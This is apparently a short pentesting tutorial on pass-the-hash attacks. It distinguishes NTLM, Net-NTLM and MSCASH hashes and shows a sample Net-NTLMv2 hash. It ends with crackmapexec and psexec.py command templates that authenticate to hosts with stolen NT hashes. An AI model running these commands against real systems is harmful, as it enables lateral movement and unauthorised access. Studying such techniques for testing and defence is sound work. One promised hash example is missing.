Pass the hash

Before we talk about this attack, let's clarify some things, let's talk about NTLM vs. NTLMv1/v2 vs. Net-NTLMv1/v2 vs MSCASHv1/v2 because there's a lot of phrasing out there and sometimes it can get confusing for people who are not used to manipulate these.

NTLM ≠ ( NTLMv1/v2 === Net-NTLMv1/v2 )≠ MSCASHv1/v2

In short :

• NTLM (aka NT) hashes are local users hashes

• NTLMv1/v2 (aka Net-NTLMv1/v2) hashes are used for network authentication

• MSCASHv1/v2 (aka DCCv1/v2) hashes are domain users hashes

NTLM hashes are stored in the Security Account Manager (SAM) database and in Domain Controller's NTDS.dit database. They look like this:

Contrary to what you'd expect, the LM hash is the one before the semicolon and the NT hash is the one after the semicolon. Starting with Windows Vista and Windows Server 2008, by default, only the NT hash is stored. Net-NTLM hashes on the other hand are used for network authentication (they are derived from a challenge/response algorithm and are based on the user's NT hash). Here's an example of a Net-NTLMv2 (a.k.a NTLMv2) hash:

admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030

From a pentesting perspective:

• You CAN perform Pass-The-Hash attacks with NTLM hashes.

• You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.

Now on to the attack to pass the hash you can still use crackmapexec :

crackmapexec <ip_range>/<CIDR> -u user -H hash(only NT part) --local

obviously you can use other tools too such as psexec:

psexec.py user:@ip_addr -hashes (the whole hash)